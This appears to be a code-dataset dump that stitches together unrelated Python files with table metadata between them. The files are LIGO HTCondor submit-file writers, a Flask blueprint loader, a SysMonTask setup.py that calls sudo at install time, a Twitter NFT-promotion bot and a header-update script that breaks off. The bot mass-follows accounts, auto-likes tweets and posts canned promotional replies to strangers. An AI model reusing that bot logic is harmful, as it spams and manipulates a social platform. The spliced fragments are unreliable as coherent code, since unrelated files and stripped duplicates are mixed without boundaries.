channel_name, channel_flow = channel_dict[ifo]
ile_job.add_arg("--ifo " + ifo)
ile_job.add_opt(ifo+"-channel", ifo+":"+channel_name)
ile_job.add_opt(ifo+"-cache", cache_file)
ile_job.add_opt(ifo+"-flow", str(channel_flow))
ile_job.add_opt(ifo+"-timeslide", str(0.0))
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_resample_sub(tag='resample', exe=None, file_input=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
Write a submit file for launching a 'resample' job
util_ResampleILEOutputWithExtrinsic.py
"""
exe = exe or which("util_ResampleILEOutputWithExtrinsic.py") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
if not(arg_str is None or len(arg_str)<2):
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_opt('fname',file_input)
ile_job.add_opt('fname-out',file_output)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(file_output)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_cat_sub(tag='cat', exe=None, file_prefix=None,file_postfix=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
Write a submit file for launching a 'resample' job
util_ResampleILEOutputWithExtrinsic.py
"""
exe = exe or which("find") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
exe_switch = which("switcheroo") # tool for patterend search-replace, to fix first line of output file
cmdname = 'catjob.sh'
with open(cmdname,'w') as f:
f.write("#! /bin/bash\n")
f.write(exe+" . -name '"+file_prefix+"*"+file_postfix+"' -exec cat {} \; | sort -r | uniq > "+file_output+";\n")
f.write(exe_switch + " 'm1 ' '# m1 ' "+file_output) # add standard prefix
os.system("chmod a+x "+cmdname)
ile_job = pipeline.CondorDAGJob(universe=universe, executable='catjob.sh')
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# ile_job.add_arg(" . -name '" + file_prefix + "*" +file_postfix+"' -exec cat {} \; ")
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_convertpsd_sub(tag='convert_psd', exe=None, ifo=None,file_input=None,target_dir=None,arg_str='',log_dir=None, universe='local',**kwargs):
"""
Write script to convert PSD from one format to another. Needs to be called once per PSD file being used.
"""
exe = exe or which("convert_psd_ascii2xml") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
ile_job.add_opt("fname-psd-ascii",file_input)
ile_job.add_opt("ifo",ifo)
ile_job.add_arg("--conventional-postfix")
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if not (target_dir is None):
# Copy output PSD into place
ile_job.add_condor_cmd("+PostCmd", '" cp '+ifo+'-psd.xml.gz ' + target_dir +'"')
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_joingrids_sub(tag='join_grids', exe=None, universe='vanilla', input_pattern=None,target_dir=None,output_base=None,log_dir=None,n_explode=1, gzip="/usr/bin/gzip", old_add=True, **kwargs):
"""
Write script to convert PSD from one format to another. Needs to be called once per PSD file being used.
"""
exe = exe or which("ligolw_add") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
# exe_here = "my_join.sh"
# with open(exe_here,'w') as f:
# f.write("#! /bin/bash \n")
# f.write(r"""
# #!/bin/bash
# # Modules and scripts run directly from repository
# # Note the repo and branch are self-referential ! Not a robust solution long-term
# # Exit on failure:
# # set -e
# {} {} > {}/{}.xml
# gzip {}.{}.xml""".format(exe,input_pattern,target_dir,output_base,target_dir,output_base) )
# os.system("chmod a+x "+exe_here)
# exe = exe_here # update executable
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
fname_out =target_dir + "/" +output_base + ".xml.gz"
ile_job.add_arg("--output="+fname_out)
working_dir = log_dir.replace("/logs", '') # assumption about workflow/naming! Danger!
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# ile_job.set_stdout_file(fname_out)
# ile_job.add_condor_cmd("+PostCmd", ' "' + gzip + ' ' +fname_out + '"')
explode_str = ""
for indx in np.arange(n_explode):
explode_str+= " {}/{}-{}.xml.gz ".format(working_dir,output_base,indx)
explode_str += " {}/{}.xml.gz ".format(working_dir,output_base)
ile_job.add_arg(explode_str)
# ile_job.add_arg("overlap-grid*.xml.gz") # working in our current directory
if old_add:
ile_job.add_opt("ilwdchar-compat",'') # needed?
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_subdagILE_sub(tag='subdag_ile', exe=None, universe='vanilla', submit_file=None,input_pattern=None,target_dir=None,output_suffix=None,log_dir=None,sim_xml=None, **kwargs):
"""
Write script to convert PSD from one format to another. Needs to be called once per PSD file being used.
"""
exe = exe or which("create_ile_sub_dag.py")
subfile = submit_file or 'ILE.sub'
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
ile_job.add_arg("--target-dir "+target_dir)
ile_job.add_arg("--output-suffix "+output_suffix)
ile_job.add_arg("--submit-script "+subfile)
ile_job.add_arg("--macroiteration $(macroiteration)")
ile_job.add_arg("--sim-xml "+sim_xml)
working_dir = log_dir.replace("/logs", '') # assumption about workflow/naming! Danger!
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# ile_job.set_stdout_file(fname_out)
# ile_job.add_condor_cmd("+PostCmd", ' "' + gzip + ' ' +fname_out + '"')
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
| 423
| 0
| 68
|
175a3b4d2739554618c982905727d9731a509a3f
| 934
|
py
|
Python
|
boot.py
|
Ca11MeE/easy_frame
|
c3ec3069e3f61d1c01e5bd7ebbdf28e953a8ffa8
|
[
"Apache-2.0"
] | null | null | null |
boot.py
|
Ca11MeE/easy_frame
|
c3ec3069e3f61d1c01e5bd7ebbdf28e953a8ffa8
|
[
"Apache-2.0"
] | null | null | null |
boot.py
|
Ca11MeE/easy_frame
|
c3ec3069e3f61d1c01e5bd7ebbdf28e953a8ffa8
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
from flask import Flask
import mysql,os,re
from mysql import Pool
import properties
# 定义WEB容器(同时防止json以ascii解码返回)
app=Flask(__name__)
app.config['JSON_AS_ASCII'] = False
# 处理各模块中的自动注入以及组装各蓝图
# dir_path中为蓝图模块路径,例如需要引入的蓝图都在routes文件夹中,则传入参数'/routes'
print('加载数据库模块')
mysql.pool = Pool.Pool()
# print('加载完毕')
print('蓝图初始化')
for path in properties.blueprint_path:
map_apps(path)
| 22.780488
| 96
| 0.639186
|
# coding: utf-8
from flask import Flask
import mysql,os,re
from mysql import Pool
import properties
# 定义WEB容器(同时防止json以ascii解码返回)
app=Flask(__name__)
app.config['JSON_AS_ASCII'] = False
# 处理各模块中的自动注入以及组装各蓝图
# dir_path中为蓝图模块路径,例如需要引入的蓝图都在routes文件夹中,则传入参数'/routes'
def map_apps(dir_path):
path=os.getcwd()+dir_path
list=os.listdir(path)
print('蓝图文件夹:','.',dir_path)
# list.remove('__pycache__')
while list:
try:
file=list.pop(0)
if file.startswith('__') and file.endswith('__'):
continue
print('加载蓝图模块:',file)
f_model=__import__(re.sub('/','',dir_path)+'.'+re.sub('\.py','',file),fromlist=True)
app.register_blueprint(f_model.app)
except:
pass
def get_app():
return app
print('加载数据库模块')
mysql.pool = Pool.Pool()
# print('加载完毕')
print('蓝图初始化')
for path in properties.blueprint_path:
map_apps(path)
| 512
| 0
| 45
|
84eea4a37f53204b935d3f1eece7e1963b816b5c
| 1,893
|
py
|
Python
|
setup.py
|
bastian-src/SysMonTask
|
95868e230efa130e820f91893a3c8d5664632ac4
|
[
"BSD-3-Clause"
] | 1
|
2021-05-20T09:31:26.000Z
|
2021-05-20T09:31:26.000Z
|
setup.py
|
bastian-src/SysMonTask
|
95868e230efa130e820f91893a3c8d5664632ac4
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
bastian-src/SysMonTask
|
95868e230efa130e820f91893a3c8d5664632ac4
|
[
"BSD-3-Clause"
] | null | null | null |
from setuptools import setup, find_packages
import os
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name='sysmontask',
version='1.3.9',
description='System Monitor With UI Like Windows',
url='https://github.com/KrispyCamel4u/SysMonTask',
author='Neeraj Kumar',
author_email='neerajjangra4u@gmail.com',
license='BSD-3',
long_description=long_description,
long_description_content_type="text/markdown",
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: BSD License",
"Operating System :: POSIX :: Linux",
'Topic :: System :: Monitoring',
],
include_package_data=True,
data_files=get_data_files(),
install_requires=['psutil>=5.7.2','PyGObject','pycairo'],
packages=find_packages(),
entry_points=dict(
console_scripts=[
'sysmontask=sysmontask.sysmontask:start',
'sysmontask.set_default=sysmontask.theme_setter:set_theme_default',
'sysmontask.set_light=sysmontask.theme_setter:set_theme_light',
'sysmontask.set_dark=sysmontask.theme_setter:set_theme_dark']
)
)
os.system("sudo glib-compile-schemas /usr/share/glib-2.0/schemas")
print("gschema Compiled")
| 39.4375
| 159
| 0.692552
|
from setuptools import setup, find_packages
import os
with open("README.md", "r") as fh:
long_description = fh.read()
def get_data_files():
data_files = [('/usr/share/sysmontask/glade_files', ['glade_files/disk.glade','glade_files/diskSidepane.glade','glade_files/gpu.glade',
'glade_files/gpuSidepane.glade','glade_files/net.glade','glade_files/netSidepane.glade','glade_files/sysmontask.glade','glade_files/filter_dialog.glade']),
('/usr/share/sysmontask/icons',['icons/SysMonTask.png']),
('/usr/share/doc/sysmontask',['AUTHORS', 'README.md','LICENSE']),
('/usr/share/applications',['SysMonTask.desktop']),
('/usr/share/glib-2.0/schemas',['com.github.camelneeraj.sysmontask.gschema.xml'])
]
return data_files
setup(
name='sysmontask',
version='1.3.9',
description='System Monitor With UI Like Windows',
url='https://github.com/KrispyCamel4u/SysMonTask',
author='Neeraj Kumar',
author_email='neerajjangra4u@gmail.com',
license='BSD-3',
long_description=long_description,
long_description_content_type="text/markdown",
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: BSD License",
"Operating System :: POSIX :: Linux",
'Topic :: System :: Monitoring',
],
include_package_data=True,
data_files=get_data_files(),
install_requires=['psutil>=5.7.2','PyGObject','pycairo'],
packages=find_packages(),
entry_points=dict(
console_scripts=[
'sysmontask=sysmontask.sysmontask:start',
'sysmontask.set_default=sysmontask.theme_setter:set_theme_default',
'sysmontask.set_light=sysmontask.theme_setter:set_theme_light',
'sysmontask.set_dark=sysmontask.theme_setter:set_theme_dark']
)
)
os.system("sudo glib-compile-schemas /usr/share/glib-2.0/schemas")
print("gschema Compiled")
| 603
| 0
| 23
|
34090bb1e8c0e500ca86d957c3a062355daf3cc0
| 8,337
|
py
|
Python
|
zelus/src/services/Twitter/twitter.py
|
Jacquesjh/Zelus
|
6beac45a7ab5e4acce76175ad78eb3287bd7e398
|
[
"MIT"
] | 1
|
2022-01-12T01:14:12.000Z
|
2022-01-12T01:14:12.000Z
|
zelus/src/services/Twitter/twitter.py
|
Jacquesjh/Zelus
|
6beac45a7ab5e4acce76175ad78eb3287bd7e398
|
[
"MIT"
] | null | null | null |
zelus/src/services/Twitter/twitter.py
|
Jacquesjh/Zelus
|
6beac45a7ab5e4acce76175ad78eb3287bd7e398
|
[
"MIT"
] | null | null | null |
from typing import List
import random
from time import sleep
from tweepy import Client
from TwitterAPI import TwitterAPI
| 33.083333
| 168
| 0.576946
|
from typing import List
import random
from time import sleep
from tweepy import Client
from TwitterAPI import TwitterAPI
class Twitter:
creds : dict
hash_tags: list
nfts_to_tweet: dict
nfts_to_reply: dict
def __init__(self, creds: dict, nfts_to_tweet: dict, nfts_to_reply: dict) -> None:
self.creds = creds
self.nfts_to_tweet = nfts_to_tweet
self.nfts_to_reply = nfts_to_reply
self.influencers = ["OpenSea", "ZssBecker", "rarible", "beeple", "BoredApeYC", "elliotrades", "MetaMask", "TheSandboxGame", "TheBinanceNFT", "DCLBlogger",
"thebrettway", "decentraland", "niftygateway", "MrsunNFT", "BinanceChain"]
self.hash_tags = ["#NFTArt", "#NFTCommunity", "#NFTCollection", "#NFTArtist", "#NFTs"]
self.my_user_id = "1474097571408883730"
def _get_bearer_client(self) -> Client:
client = Client(bearer_token = self.creds["bearer_token"], wait_on_rate_limit = True)
return client
def _get_access_client(self) -> Client:
client = Client(consumer_key = self.creds["consumer_key"],
consumer_secret = self.creds["consumer_secret"],
access_token = self.creds["access_token"],
access_token_secret = self.creds["access_secret"],
wait_on_rate_limit = True)
return client
def _search_followables(self) -> List[str]:
client = self._get_bearer_client()
influencer = client.get_user(username = random.choice(self.influencers))
choices = ["follow from tweets", "follow from followers"]
if random.choice(choices) == choices[0]:
print("searching from tweets")
tweets = self._get_user_timeline_tweets(user_id = influencer.data["id"])
tweets = [t for t in tweets.data]
random.shuffle(tweets)
likers = []
for i in range(5):
chosen_tweet = tweets.pop(0)
temp = client.get_liking_users(id = chosen_tweet.id)
new = [l.id for l in temp.data]
likers += new
return likers
else:
temp = client.get_users_followers(id = influencer.data["id"], max_results = 1000)
followers = [f.id for f in temp.data]
return followers
def _get_user_timeline_tweets(self, user_id: str) -> list:
client = self._get_bearer_client()
tweets = client.get_users_tweets(id = user_id, exclude = ["retweets"])
return tweets
def _like_tweet(self, tweet_id: str) -> None:
client = self._get_access_client()
response = client.like(tweet_id = tweet_id)
def _follow(self, user_id: str) -> None:
client = self._get_access_client()
response = client.follow_user(target_user_id = user_id)
def _get_my_timeline(self) -> list:
client = self._get_bearer_client()
ts = client.get_users_tweets(id = self.my_user_id, tweet_fields = ["context_annotations"])
tweets = []
retweets = []
for tweet in ts.data:
if tweet.data["text"].startswith("@"):
retweets.append(tweet)
else:
tweets.append(tweet)
return tweets, retweets
def _search_tweets_to_reply(self) -> List[str]:
client = self._get_bearer_client()
query = ["drop your nft -is:retweet"]
ts = client.search_recent_tweets(query = query, tweet_fields = ["context_annotations"], max_results = 100)
tweets = []
for tweet in ts.data:
if tweet["text"].startswith("@") == False:
tweets.append(tweet)
return tweets
def _reply(self, tweet_id: str) -> None:
chosen_nft = random.choice(list(self.nfts_to_reply.keys()))
nft_info = self.nfts_to_reply[chosen_nft]
collection = nft_info["collection"]
link = nft_info["link"]
random.shuffle(self.hash_tags)
hashtags = f"{self.hash_tags[0]} {self.hash_tags[1]} {self.hash_tags[2]} {self.hash_tags[3]} {self.hash_tags[4]}"
text1 = random.choice(["Get this #NFT", "Check this #NFT", "How about this #NFT"])
text2 = random.choice([":", " to display in the #Metaverse:", " for you #Metaverse collection:"])
text3 = random.choice(["by me", "by myself", "by yours truly"])
text4 = random.choice(["From the", "Part of the", "Out of the"])
text5 = random.choice(["Luxury", ""])
text6 = random.choice(["available at", "only at", "at"])
text = f'{text1}{text2}"{chosen_nft}" {text3} #JacquesDeVoid | {text4} {collection} {text5} Collection {text6} @opensea\n\n {hashtags} \n {link}'
client = self._get_access_client()
response = client.create_tweet(text = text, in_reply_to_tweet_id = tweet_id)
self._like_tweet(tweet_id = response.data["id"])
def _get_my_retweets(self) -> List[str]:
tweets = self._get_my_timeline()[1]
return tweets
def _get_my_tweets(self) -> List[str]:
tweets = self._get_my_timeline()[0]
return tweets
def _delete_tweet(self, tweet_id: str) -> None:
client = self._get_access_client()
response = client.delete_tweet(id = tweet_id)
def _get_my_num_followers(self) -> int:
api = TwitterAPI(self.creds["consumer_key"],
self.creds["consumer_secret"],
self.creds["access_token"],
self.creds["access_secret"],
api_version = "2")
followers = api.request(f"users/:{self.my_user_id}/followers")
count = len([f for f in followers])
return count
def reply_something(self) -> None:
tweets = self._search_tweets_to_reply()
for tweet in tweets:
self._like_tweet(tweet_id = tweet.data["id"])
tweet = random.choice(tweets)
self._reply(tweet_id = tweet.data["id"])
def delete_my_timeline(self) -> None:
tweets = self._get_my_tweets()
for tweet in tweets:
self._delete_tweet(tweet_id = tweet.data["id"])
def follow_people(self) -> None:
num_followers = self._get_my_num_followers()
if num_followers < 1000:
num_followers = 1000
coef = 0.08
to_follow = coef*num_followers
count = 0
if to_follow > 500:
to_follow = 500
while count < to_follow:
people = self._search_followables()
if people != None:
if len(people) > to_follow - count:
index = to_follow - count
else:
index = len(people)
for i in range(int(index)):
sleep(random.randint(60, 180))
self._follow(user_id = people[i])
count += 1
def tweet(self) -> None:
chosen_nft = random.choice(list(self.nfts_to_tweet.keys()))
nft_info = self.nfts_to_tweet.pop(chosen_nft)
collection = nft_info["collection"]
link = nft_info["link"]
random.shuffle(self.hash_tags)
hashtags = f"{self.hash_tags[0]} {self.hash_tags[1]} {self.hash_tags[2]} {self.hash_tags[3]} {self.hash_tags[4]} #Metaverse"
text1 = random.choice(["Behold", "How about", "Check", "How would you like"])
text2 = random.choice(["this", "my"])
text3 = random.choice(["amazing", "awesome"])
text4 = random.choice(["by me", "by myself", "by yours truly"])
text5 = random.choice(["From the", "Part of the", "Out of the"])
text6 = random.choice(["Luxury", ""])
text7 = random.choice(["available at", "only at", "at"])
text = f'{text1} {text2} {text3} "{chosen_nft}" #NFT {text4} #JacquesDeVoid | {text5} {collection} {text6} Collection {text7} @opensea\n\n {hashtags} \n {link}'
client = self._get_access_client()
response = client.create_tweet(text = text)
self._like_tweet(tweet_id = response.data["id"])
| 7,600
| 591
| 23
|
210a678a3c714cdead1544323597dcdb1cff8f70
| 323
|
py
|
Python
|
day8/d8p2.py
|
Akankshasharmaa/100DaysOfCode
|
395bd8bd063495af7d04ec7b2f819923f502059f
|
[
"MIT"
] | 2
|
2021-12-22T07:43:14.000Z
|
2021-12-24T12:07:33.000Z
|
day8/d8p2.py
|
Akankshasharmaa/100DaysOfCode
|
395bd8bd063495af7d04ec7b2f819923f502059f
|
[
"MIT"
] | null | null | null |
day8/d8p2.py
|
Akankshasharmaa/100DaysOfCode
|
395bd8bd063495af7d04ec7b2f819923f502059f
|
[
"MIT"
] | 1
|
2021-12-22T07:43:26.000Z
|
2021-12-22T07:43:26.000Z
|
result = non_start('Hello', 'There')
print(result)
result = non_start('java', 'code')
print(result)
result = non_start('shotl', '')
print(result)
| 24.846154
| 54
| 0.616099
|
def non_start(str1, str2):
if len(str1) >= 1 and len(str2) >= 1:
newstr = str1[1:len(str1)] + str2[1:len(str2)]
return newstr
else:
return False
result = non_start('Hello', 'There')
print(result)
result = non_start('java', 'code')
print(result)
result = non_start('shotl', '')
print(result)
| 155
| 0
| 22
|
a1b5ff50c9c782fea188c9b6fb9e25d0a0c8232c
| 705
|
py
|
Python
|
port.py
|
hawk-0fcx/port
|
223024c4ca7b95c34182b74d8116280f9371fc53
|
[
"Apache-2.0"
] | 1
|
2022-03-12T11:33:16.000Z
|
2022-03-12T11:33:16.000Z
|
port.py
|
hawk-unity/port
|
223024c4ca7b95c34182b74d8116280f9371fc53
|
[
"Apache-2.0"
] | null | null | null |
port.py
|
hawk-unity/port
|
223024c4ca7b95c34182b74d8116280f9371fc53
|
[
"Apache-2.0"
] | null | null | null |
import socket
import os
os.system("clear")
import colorama
from colorama import Fore, Back, Style, init
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
print("""
_ _
| |__ __ ___ _| | __ _
| '_ \ / _` \ \ /\ / / |/ /| |_
| | | | (_| |\ V V /| <_ _|
|_| |_|\__,_| \_/\_/ |_|\_\|_|
^port tarama^
""")
host = input(Fore.RED + "LÜTFEN İP ADRESİNİ GİRİNİZ : ")
port = int(input(Fore.RED + "TARATILACAK PORT ADRESİNİ GİRİNİZ : "))
portScanner(port)
| 26.111111
| 68
| 0.537589
|
import socket
import os
os.system("clear")
import colorama
from colorama import Fore, Back, Style, init
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
print("""
_ _
| |__ __ ___ _| | __ _
| '_ \ / _` \ \ /\ / / |/ /| |_
| | | | (_| |\ V V /| <_ _|
|_| |_|\__,_| \_/\_/ |_|\_\|_|
^port tarama^
""")
host = input(Fore.RED + "LÜTFEN İP ADRESİNİ GİRİNİZ : ")
port = int(input(Fore.RED + "TARATILACAK PORT ADRESİNİ GİRİNİZ : "))
def portScanner(port):
if s.connect_ex((host, port)):
print(Fore.GREEN + "BU PORT KAPALI")
else:
print(Fore.GREEN + "BU PORT AÇIK")
portScanner(port)
| 135
| 0
| 23
|
09bff90f642cffe4743a7a3613eb947ba5cade52
| 156
|
py
|
Python
|
_solved/solutions/01-introduction-geospatial-data19.py
|
lleondia/geopandas-tutorial
|
5128fd6865bbd979a7b4e5b8cb4d0de51bead029
|
[
"BSD-3-Clause"
] | 341
|
2018-04-26T08:46:05.000Z
|
2022-03-01T08:13:39.000Z
|
_solved/solutions/01-introduction-geospatial-data19.py
|
lleondia/geopandas-tutorial
|
5128fd6865bbd979a7b4e5b8cb4d0de51bead029
|
[
"BSD-3-Clause"
] | 24
|
2020-09-30T19:57:14.000Z
|
2021-10-05T07:21:09.000Z
|
_solved/solutions/01-introduction-geospatial-data19.py
|
lleondia/geopandas-tutorial
|
5128fd6865bbd979a7b4e5b8cb4d0de51bead029
|
[
"BSD-3-Clause"
] | 128
|
2018-05-07T07:30:29.000Z
|
2022-02-19T17:53:39.000Z
|
# As comparison, the misleading plot when not turning the population number into a density
districts.plot(column='population', figsize=(12, 6), legend=True)
| 78
| 90
| 0.788462
|
# As comparison, the misleading plot when not turning the population number into a density
districts.plot(column='population', figsize=(12, 6), legend=True)
| 0
| 0
| 0
|
15c549b448318131afb3c0205f8085e21f227080
| 9,494
|
py
|
Python
|
update_headers.py
|
simoncozens/pysilfont
|
bb8a9fc58a83e074bbcc466ba058841845b9107e
|
[
"MIT"
] | 41
|
2015-05-21T21:12:26.000Z
|
2022-02-17T17:23:14.000Z
|
update_headers.py
|
simoncozens/pysilfont
|
bb8a9fc58a83e074bbcc466ba058841845b9107e
|
[
"MIT"
] | 63
|
2015-05-15T10:25:55.000Z
|
2021-02-23T04:51:17.000Z
|
update_headers.py
|
simoncozens/pysilfont
|
bb8a9fc58a83e074bbcc466ba058841845b9107e
|
[
"MIT"
] | 12
|
2015-06-12T11:52:08.000Z
|
2020-09-23T10:40:59.000Z
|
#!/usr/bin/env python
'Checks for standard headers and update version and copyright info in python files'
__url__ = 'http://github.com/silnrsi/pysilfont'
__copyright__ = 'Copyright (c) 2016 SIL International (http://www.sil.org)'
__license__ = 'Released under the MIT License (http://opensource.org/licenses/MIT)'
__author__ = 'David Raymond'
cyear = "2016" # Year to use if no other copyright year present
from silfont.core import execute
import os,sys
argspec = [
('action',{'help': 'Action - report or update', 'nargs': '?', 'default': 'report', 'choices': ('report','update')},{}),
('-l','--log',{'help': 'Log file'}, {'type': 'outfile', 'def': 'local/update_headers.log'})]
execute(None,doit, argspec)
| 48.192893
| 123
| 0.425637
|
#!/usr/bin/env python
'Checks for standard headers and update version and copyright info in python files'
__url__ = 'http://github.com/silnrsi/pysilfont'
__copyright__ = 'Copyright (c) 2016 SIL International (http://www.sil.org)'
__license__ = 'Released under the MIT License (http://opensource.org/licenses/MIT)'
__author__ = 'David Raymond'
cyear = "2016" # Year to use if no other copyright year present
from silfont.core import execute
import os,sys
argspec = [
('action',{'help': 'Action - report or update', 'nargs': '?', 'default': 'report', 'choices': ('report','update')},{}),
('-l','--log',{'help': 'Log file'}, {'type': 'outfile', 'def': 'local/update_headers.log'})]
def doit(args) :
global file
action = args.action
params = args.paramsobj
logger=params.logger
varlist = ['url', 'copyright', 'license', 'author', 'version']
copyrightpre = 'Copyright (c) '
copyrightpost = ' SIL International (http://www.sil.org)'
standards = {
'copyright': copyrightpre + cyear + copyrightpost,
'version': params.sets['default']['version'],
'url': 'http://github.com/silnrsi/pysilfont',
'license': 'Released under the MIT License (http://opensource.org/licenses/MIT)'}
pythonfiles = {}
otherfiles = []
for subdir, dirs, files in os.walk("."):
if not (subdir=="." or subdir[0:5] in ("./lib","./scr")) : continue
if subdir[0:] == "./lib/pysilfont.egg-info" : continue
for filen in files:
if filen[-1:]=="~" : continue
if filen[-3:]=="pyc" : continue
if filen in ("__init__.py", "ez_setup.py") : continue
needver = (True if filen in ('setup.py', 'param.py') else False)
fulln = os.path.join(subdir,filen)
file = open(fulln,"r")
line1 = nextline()
pyline1 = (True if line1 in ("#!/usr/bin/env python", "#!/usr/bin/python") else False)
if pyline1 or filen[-3:] == ".py" :
# Look for standard headers
headererror = []
headers = "#!/usr/bin/env python"
if pyline1 :
# Read description which may be single or multiline
line = nextline()
headers = headers + "\n"+line
if line[0:3] == "'''" :
while line[-3:] != "'''" :
line = nextline()
if line =="EOF" : break # Must be EOF
headers = headers + "\n"+line
if line =="EOF" : headererror.append("No closing ''' to description")
elif line[0:1] != "'" : headererror.append("No description")
if headererror :
